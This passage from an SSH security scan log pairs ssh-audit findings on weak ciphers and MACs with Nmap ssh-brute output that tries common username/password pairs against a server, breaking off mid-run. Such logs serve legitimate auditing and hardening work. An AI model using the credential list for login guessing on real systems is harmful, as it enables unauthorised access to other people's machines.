704. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
705. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
706. `- [warn] using weak cipher
707. `- [info] available since OpenSSH 4.2
708. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
709. `- [warn] using weak cipher mode
710. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
711. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
712. `- [warn] using weak cipher
713. `- [warn] using weak cipher mode
714. `- [warn] using small 64-bit block size
715. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
716. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
717. `- [fail] disabled since Dropbear SSH 0.53
718. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
719. `- [warn] using weak cipher mode
720. `- [warn] using small 64-bit block size
721. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
722. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
723. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
724. `- [warn] using weak cipher mode
725. `- [warn] using small 64-bit block size
726. `- [info] available since OpenSSH 2.1.0
727. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
728. `- [warn] using weak cipher mode
729. `- [info] available since OpenSSH 2.3.0
730. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
731. `- [warn] using weak cipher mode
732. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
733. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
734. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
735. `- [warn] using weak cipher
736. `- [info] available since OpenSSH 2.1.0
737. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
738. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
739. `- [warn] using weak cipher mode
740. `- [info] available since OpenSSH 2.3.0
741.  
742. # message authentication code algorithms
743. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
744. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
745. `- [warn] using encrypt-and-MAC mode
746. `- [warn] using weak hashing algorithm
747. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
748. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
749. `- [warn] using weak hashing algorithm
750. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
751. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
752. `- [warn] using small 64-bit tag size
753. `- [info] available since OpenSSH 4.7
754. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
755. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
756. (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
757. `- [warn] using encrypt-and-MAC mode
758. `- [info] available since OpenSSH 5.9
759. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
760. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
761. (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
762. `- [warn] using encrypt-and-MAC mode
763. `- [info] available since OpenSSH 5.9
764. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
765. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
766. `- [warn] using encrypt-and-MAC mode
767. `- [info] available since OpenSSH 2.5.0
768. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
769. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
770. `- [warn] using encrypt-and-MAC mode
771. `- [info] available since OpenSSH 2.1.0
772. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
773. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
774. `- [warn] using encrypt-and-MAC mode
775. `- [warn] using weak hashing algorithm
776. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
777. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
778. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
779. `- [warn] using encrypt-and-MAC mode
780. `- [warn] using weak hashing algorithm
781. `- [info] available since OpenSSH 2.5.0
782.  
783. # algorithm recommendations (for OpenSSH 6.0)
784. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
785. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
786. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
787. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
788. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
789. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
790. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
791. (rec) -ssh-dss -- key algorithm to remove
792. (rec) -arcfour -- enc algorithm to remove
793. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
794. (rec) -blowfish-cbc -- enc algorithm to remove
795. (rec) -3des-cbc -- enc algorithm to remove
796. (rec) -aes256-cbc -- enc algorithm to remove
797. (rec) -arcfour256 -- enc algorithm to remove
798. (rec) -cast128-cbc -- enc algorithm to remove
799. (rec) -aes192-cbc -- enc algorithm to remove
800. (rec) -arcfour128 -- enc algorithm to remove
801. (rec) -aes128-cbc -- enc algorithm to remove
802. (rec) -hmac-md5-96 -- mac algorithm to remove
803. (rec) -hmac-sha2-256-96 -- mac algorithm to remove
804. (rec) -hmac-ripemd160 -- mac algorithm to remove
805. (rec) -hmac-sha1-96 -- mac algorithm to remove
806. (rec) -umac-64@openssh.com -- mac algorithm to remove
807. (rec) -hmac-md5 -- mac algorithm to remove
808. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
809. (rec) -hmac-sha1 -- mac algorithm to remove
810. (rec) -hmac-sha2-512-96 -- mac algorithm to remove
811.  
812.  
813. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:09 EDT
814. NSE: [ssh-run] Failed to specify credentials and command to run.
815. NSE: [ssh-brute] Trying username/password pair: root:root
816. NSE: [ssh-brute] Trying username/password pair: admin:admin
817. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
818. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
819. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
820. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
821. NSE: [ssh-brute] Trying username/password pair: guest:guest
822. NSE: [ssh-brute] Trying username/password pair: user:user
823. NSE: [ssh-brute] Trying username/password pair: web:web
824. NSE: [ssh-brute] Trying username/password pair: test:test
825. NSE: [ssh-brute] Trying username/password pair: root:
826. NSE: [ssh-brute] Trying username/password pair: admin:
827. NSE: [ssh-brute] Trying username/password pair: administrator:
828. NSE: [ssh-brute] Trying username/password pair: webadmin:
829. NSE: [ssh-brute] Trying username/password pair: sysadmin:
830. NSE: [ssh-brute] Trying username/password pair: netadmin:
831. NSE: [ssh-brute] Trying username/password pair: guest:
832. NSE: [ssh-brute] Trying username/password pair: user:
833. NSE: [ssh-brute] Trying username/password pair: web:
834. NSE: [ssh-brute] Trying username/password pair: test:
835. NSE: [ssh-brute] Trying username/password pair: root:123456
836. NSE: [ssh-brute] Trying username/password pair: admin:123456
837. NSE: [ssh-brute] Trying username/password pair: administrator:123456
838. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
839. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
840. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
841. NSE: [ssh-brute] Trying username/password pair: guest:123456
842. NSE: [ssh-brute] Trying username/password pair: user:123456
843. NSE: [ssh-brute] Trying username/password pair: web:123456
844. NSE: [ssh-brute] Trying username/password pair: test:123456
845. NSE: [ssh-brute] Trying username/password pair: root:12345
846. NSE: [ssh-brute] Trying username/password pair: admin:12345
847. NSE: [ssh-brute] Trying username/password pair: administrator:12345
848. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
849. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
850. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
851. NSE: [ssh-brute] Trying username/password pair: guest:12345
852. NSE: [ssh-brute] Trying username/password pair: user:12345
853. NSE: [ssh-brute] Trying username/password pair: web:12345
854. NSE: [ssh-brute] Trying username/password pair: test:12345
855. NSE: [ssh-brute] Trying username/password pair: root:123456789
856. NSE: [ssh-brute] Trying username/password pair: admin:123456789
857. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
858. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
859. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
860. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
861. NSE: [ssh-brute] Trying username/password pair: guest:123456789
862. NSE: [ssh-brute] Trying username/password pair: user:123456789
863. NSE: [ssh-brute] Trying username/password pair: web:123456789
864. NSE: [ssh-brute] Trying username/password pair: test:123456789
865. NSE: [ssh-brute] Trying username/password pair: root:password
866. NSE: [ssh-brute] Trying username/password pair: admin:password
867. NSE: [ssh-brute] Trying username/password pair: administrator:password
868. NSE: [ssh-brute] Trying username/password pair: webadmin:password
869. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
870. NSE: [ssh-brute] Trying username/password pair: netadmin:password
871. NSE: [ssh-brute] Trying username/password pair: guest:password
872. NSE: [ssh-brute] Trying username/password pair: user:password
873. NSE: [ssh-brute] Trying username/password pair: web:password
874. NSE: [ssh-brute] Trying username/password pair: test:password
875. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
876. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
877. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
878. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
879. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
880. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
881. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
882. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
883. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
884. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
885. NSE: [ssh-brute] Trying username/password pair: root:princess
886. NSE: [ssh-brute] Trying username/password pair: admin:princess
887. NSE: [ssh-brute] Trying username/password pair: administrator:princess
888. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
889. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
890. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
891. NSE: [ssh-brute] Trying username/password pair: guest:princess
892. NSE: [ssh-brute] Trying username/password pair: user:princess
893. NSE: [ssh-brute] Trying username/password pair: web:princess
894. NSE: [ssh-brute] Trying username/password pair: test:princess
895. NSE: [ssh-brute] Trying username/password pair: root:12345678
896. NSE: [ssh-brute] Trying username/password pair: admin:12345678
897. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
898. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
899. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
900. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
901. NSE: [ssh-brute] Trying username/password pair: guest:12345678
902. NSE: [ssh-brute] Trying username/password pair: user:12345678
903. NSE: [ssh-brute] Trying username/password pair: web:12345678
904. NSE: [ssh-brute] Trying username/password pair: test:12345678
905. NSE: [ssh-brute] Trying username/password pair: root:1234567
906. NSE: [ssh-brute] Trying username/password pair: admin:1234567
907. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
908. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
909. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
910. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
911. NSE: [ssh-brute] Trying username/password pair: guest:1234567
912. NSE: [ssh-brute] Trying username/password pair: user:1234567
913. NSE: [ssh-brute] Trying username/password pair: web:1234567
914. NSE: [ssh-brute] Trying username/password pair: test:1234567
915. NSE: [ssh-brute] Trying username/password pair: root:abc123
916. NSE: [ssh-brute] Trying username/password pair: admin:abc123
917. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
918. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
919. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
920. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
921. NSE: [ssh-brute] Trying username/password pair: guest:abc123
922. NSE: [ssh-brute] Trying username/password pair: user:abc123
923. NSE: [ssh-brute] Trying username/password pair: web:abc123
924. NSE: [ssh-brute] Trying username/password pair: test:abc123
925. NSE: [ssh-brute] Trying username/password pair: root:nicole
926. NSE: [ssh-brute] Trying username/password pair: admin:nicole
927. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
928. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
929. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
930. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
931. NSE: [ssh-brute] Trying username/password pair: guest:nicole
932. NSE: [ssh-brute] Trying username/password pair: user:nicole
933. NSE: [ssh-brute] Trying username/password pair: web:nicole
934. NSE: [ssh-brute] Trying username/password pair: test:nicole
935. NSE: [ssh-brute] Trying username/password pair: root:daniel
936. NSE: [ssh-brute] Trying username/password pair: admin:daniel
937. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
938. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
939. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
940. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
941. NSE: [ssh-brute] Trying username/password pair: guest:daniel
942. NSE: [ssh-brute] Trying username/password pair: user:daniel
943. NSE: [ssh-brute] Trying username/password pair: web:daniel
944. NSE: [ssh-brute] Trying username/password pair: test:daniel
945. NSE: [ssh-brute] Trying username/password pair: root:monkey
946. NSE: [ssh-brute] Trying username/password pair: admin:monkey
947. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
948. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
949. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
950. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
951. NSE: [ssh-brute] Trying username/password pair: guest:monkey
952. NSE: [ssh-brute] Trying username/password pair: user:monkey
953. NSE: [ssh-brute] Trying username/password pair: web:monkey
954. NSE: [ssh-brute] Trying username/password pair: test:monkey
955. NSE: [ssh-brute] Trying username/password pair: root:babygirl
956. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
957. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
958. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
959. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
960. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
961. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
962. NSE: [ssh-brute] Trying username/password pair: user:babygirl
963. NSE: [ssh-brute] Trying username/password pair: web:babygirl
964. NSE: [ssh-brute] Trying username/password pair: test:babygirl
965. NSE: [ssh-brute] Trying username/password pair: root:qwerty
966. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
967. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
968. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
969. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
970. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
971. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
972. NSE: [ssh-brute] Trying username/password pair: user:qwerty
973. NSE: [ssh-brute] Trying username/password pair: web:qwerty
974. NSE: [ssh-brute] Trying username/password pair: test:qwerty
975. NSE: [ssh-brute] Trying username/password pair: root:lovely
976. NSE: [ssh-brute] Trying username/password pair: admin:lovely
977. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
978. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
979. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
980. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
981. NSE: [ssh-brute] Trying username/password pair: guest:lovely
982. NSE: [ssh-brute] Trying username/password pair: user:lovely
983. NSE: [ssh-brute] Trying username/password pair: web:lovely
984. NSE: [ssh-brute] Trying username/password pair: test:lovely
985. NSE: [ssh-brute] Trying username/password pair: root:654321
986. NSE: [ssh-brute] Trying username/password pair: admin:654321
987. NSE: [ssh-brute] Trying username/password pair: administrator:654321
988. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
989. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
990. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
991. NSE: [ssh-brute] Trying username/password pair: guest:654321
992. NSE: [ssh-brute] Trying username/password pair: user:654321
993. NSE: [ssh-brute] Trying username/password pair: web:654321
994. NSE: [ssh-brute] Trying username/password pair: test:654321
995. NSE: [ssh-brute] Trying username/password pair: root:michael
996. NSE: [ssh-brute] Trying username/password pair: admin:michael
997. NSE: [ssh-brute] Trying username/password pair: administrator:michael
998. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
999. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
1000. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
1001. NSE: [ssh-brute] Trying username/password pair: guest:michael
1002. NSE: [ssh-brute] Trying username/password pair: user:michael
1003. NSE: [ssh-brute] Trying username/password pair: web:michael
1004. NSE: [ssh-brute] Trying username/password pair: test:michael
1005. NSE: [ssh-brute] Trying username/password pair: root:jessica
1006. NSE: [ssh-brute] Trying username/password pair: admin:jessica
1007. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
1008. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
1009. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
1010. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
1011. NSE: [ssh-brute] Trying username/password pair: guest:jessica
1012. NSE: [ssh-brute] Trying username/password pair: user:jessica
1013. NSE: [ssh-brute] Trying username/password pair: web:jessica
1014. NSE: [ssh-brute] Trying username/password pair: test:jessica
1015. NSE: [ssh-brute] Trying username/password pair: root:111111
1016. NSE: [ssh-brute] Trying username/password pair: admin:111111
1017. NSE: [ssh-brute] Trying username/password pair: administrator:111111
1018. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
1019. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
1020. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
1021. NSE: [ssh-brute] Trying username/password pair: guest:111111
1022. NSE: [ssh-brute] Trying username/password pair: user:111111
1023. NSE: [ssh-brute] Trying username/password pair: web:111111
1024. NSE: [ssh-brute] Trying username/password pair: test:111111
1025. NSE: [ssh-brute] Trying username/password pair: root:ashley
1026. NSE: [ssh-brute] Trying username/password pair: admin:ashley
1027. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
1028. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
1029. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
1030. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
1031. NSE: [ssh-brute] Trying username/password pair: guest:ashley
1032. NSE: [ssh-brute] Trying username/password pair: user:ashley
1033. NSE: [ssh-brute] Trying username/password pair: web:ashley
1034. NSE: [ssh-brute] Trying username/password pair: test:ashley
1035. NSE: [ssh-brute] Trying username/password pair: root:000000
1036. NSE: [ssh-brute] Trying username/password pair: admin:000000
1037. NSE: [ssh-brute] Trying username/password pair: administrator:000000
1038. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
1039. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
1040. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
1041. NSE: [ssh-brute] Trying username/password pair: guest:000000
1042. NSE: [ssh-brute] Trying username/password pair: user:000000
1043. NSE: [ssh-brute] Trying username/password pair: web:000000
1044. NSE: [ssh-brute] Trying username/password pair: test:000000
1045. NSE: [ssh-brute] Trying username/password pair: root:iloveu
1046. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
1047. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
1048. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
1049. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
1050. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
1051. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
1052. NSE: [ssh-brute] Trying username/password pair: user:iloveu
1053. NSE: [ssh-brute] Trying username/password pair: web:iloveu
1054. NSE: [ssh-brute] Trying username/password pair: test:iloveu
1055. NSE: [ssh-brute] Trying username/password pair: root:michelle
1056. NSE: [ssh-brute] Trying username/password pair: admin:michelle
1057. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
1058. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
1059. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
1060. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
1061. NSE: [ssh-brute] Trying username/password pair: guest:michelle
1062. NSE: [ssh-brute] Trying username/password pair: user:michelle
1063. NSE: [ssh-brute] Trying username/password pair: web:michelle
1064. NSE: [ssh-brute] Trying username/password pair: test:michelle
1065. NSE: [ssh-brute] Trying username/password pair: root:tigger
1066. NSE: [ssh-brute] Trying username/password pair: admin:tigger
1067. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
1068. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
1069. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
1070. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
1071. NSE: [ssh-brute] Trying username/password pair: guest:tigger
1072. NSE: [ssh-brute] Trying username/password pair: user:tigger
1073. NSE: [ssh-brute] Trying username/password pair: web:tigger
1074. NSE: [ssh-brute] Trying username/password pair: test:tigger
1075. NSE: [ssh-brute] Trying username/password pair: root:sunshine
1076. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
1077. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
1078. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
1079. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
1080. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
1081. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
1082. NSE: [ssh-brute] Trying username/password pair: user:sunshine
1083. NSE: [ssh-brute] Trying username/password pair: web:sunshine
1084. NSE: [ssh-brute] Trying username/password pair: test:sunshine
1085. NSE: [ssh-brute] Trying username/password pair: root:chocolate
1086. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
1087. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
1088. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
1089. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
1090. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
1091. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
1092. NSE: [ssh-brute] Trying username/password pair: user:chocolate
1093. NSE: [ssh-brute] Trying username/password pair: web:chocolate
1094. NSE: [ssh-brute] Trying username/password pair: test:chocolate
1095. NSE: [ssh-brute] Trying username/password pair: root:password1
1096. NSE: [ssh-brute] Trying username/password pair: admin:password1
1097. NSE: [ssh-brute] Trying username/password pair: administrator:password1
1098. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
1099. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
1100. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
1101. NSE: [ssh-brute] Trying username/password pair: guest:password1
1102. NSE: [ssh-brute] Trying username/password pair: user:password1
1103. NSE: [ssh-brute] Trying username/password pair: web:password1
1104. NSE: [ssh-brute] Trying username/password pair: test:password1
1105. NSE: [ssh-brute] Trying username/password pair: root:soccer
1106. NSE: [ssh-brute] Trying username/password pair: admin:soccer
1107. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
1108. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
1109. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
1110. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
1111. NSE: [ssh-brute] Trying username/password pair: guest:soccer
1112. NSE: [ssh-brute] Trying username/password pair: user:soccer
1113. NSE: [ssh-brute] Trying username/password pair: web:soccer
1114. NSE: [ssh-brute] Trying username/password pair: test:soccer
1115. NSE: [ssh-brute] Trying username/password pair: root:anthony
1116. NSE: [ssh-brute] Trying username/password pair: admin:anthony
1117. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
1118. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
1119. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
1120. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
1121. NSE: [ssh-brute] Trying username/password pair: guest:anthony
1122. NSE: [ssh-brute] Trying username/password pair: user:anthony
1123. NSE: [ssh-brute] Trying username/password pair: web:anthony
1124. NSE: [ssh-brute] Trying username/password pair: test:anthony
1125. NSE: [ssh-brute] Trying username/password pair: root:friends
1126. NSE: [ssh-brute] Trying username/password pair: admin:friends
1127. NSE: [ssh-brute] Trying username/password pair: administrator:friends
1128. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
1129. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
1130. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
1131. NSE: [ssh-brute] Trying username/password pair: guest:friends
1132. NSE: [ssh-brute] Trying username/password pair: user:friends
1133. NSE: [ssh-brute] Trying username/password pair: web:friends
1134. NSE: [ssh-brute] Trying username/password pair: test:friends
1135. NSE: [ssh-brute] Trying username/password pair: root:purple
1136. NSE: [ssh-brute] Trying username/password pair: admin:purple
1137. NSE: [ssh-brute] Trying username/password pair: administrator:purple
1138. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
1139. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
1140. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
1141. NSE: [ssh-brute] Trying username/password pair: guest:purple
1142. NSE: [ssh-brute] Trying username/password pair: user:purple
1143. NSE: [ssh-brute] Trying username/password pair: web:purple
1144. NSE: [ssh-brute] Trying username/password pair: test:purple
1145. NSE: [ssh-brute] Trying username/password pair: root:angel
1146. NSE: [ssh-brute] Trying username/password pair: admin:angel
1147. NSE: [ssh-brute] Trying username/password pair: administrator:angel
1148. NSE: [ssh-brute] Trying username/password pair: webadmin:angel
1149. NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
1150. NSE: [ssh-brute] Trying username/password pair: netadmin:angel
1151. NSE: [ssh-brute] Trying username/password pair: guest:angel
1152. NSE: [ssh-brute] Trying username/password pair: user:angel
1153. NSE: [ssh-brute] Trying username/password pair: web:angel
1154. NSE: [ssh-brute] Trying username/password pair: test:angel
1155. NSE: [ssh-brute] Trying username/password pair: root:butterfly
1156. NSE: [ssh-brute] Trying username/password pair: admin:butterfly
1157. NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
1158. NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
1159. NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
1160. NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
1161. NSE: [ssh-brute] Trying username/password pair: guest:butterfly
1162. NSE: [ssh-brute] Trying username/password pair: user:butterfly
1163. NSE: [ssh-brute] Trying username/password pair: web:butterfly
1164. NSE: [ssh-brute] Trying username/password pair: test:butterfly
1165. NSE: [ssh-brute] Trying username/password pair: root:jordan
1166. NSE: [ssh-brute] Trying username/password pair: admin:jordan
1167. NSE: [ssh-brute] Trying username/password pair: administrator:jordan
1168. NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
1169. NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
1170. NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
1171. NSE: [ssh-brute] Trying username/password pair: guest:jordan
1172. NSE: [ssh-brute] Trying username/password pair: user:jordan
1173. NSE: [ssh-brute] Trying username/password pair: web:jordan
1174. NSE: [ssh-brute] Trying username/password pair: test:jordan
1175. NSE: [ssh-brute] Trying username/password pair: root:fuckyou
1176. NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
1177. NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
1178. NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
1179. NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
1180. NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
1181. NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
1182. NSE: [ssh-brute] Trying username/password pair: user:fuckyou
1183. NSE: [ssh-brute] Trying username/password pair: web:fuckyou
1184. NSE: [ssh-brute] Trying username/password pair: test:fuckyou
1185. NSE: [ssh-brute] Trying username/password pair: root:123123
1186. NSE: [ssh-brute] Trying username/password pair: admin:123123
1187. NSE: [ssh-brute] Trying username/password pair: administrator:123123
1188. NSE: [ssh-brute] Trying username/password pair: webadmin:123123
1189. NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
1190. NSE: [ssh-brute] Trying username/password pair: netadmin:123123
1191. NSE: [ssh-brute] Trying username/password pair: guest:123123
1192. NSE: [ssh-brute] Trying username/password pair: user:123123
1193. NSE: [ssh-brute] Trying username/password pair: web:123123
1194. NSE: [ssh-brute] Trying username/password pair: test:123123
1195. NSE: [ssh-brute] Trying username/password pair: root:justin
1196. NSE: [ssh-brute] Trying username/password pair: admin:justin
1197. NSE: [ssh-brute] Trying username/password pair: administrator:justin
1198. NSE: [ssh-brute] Trying username/password pair: webadmin:justin
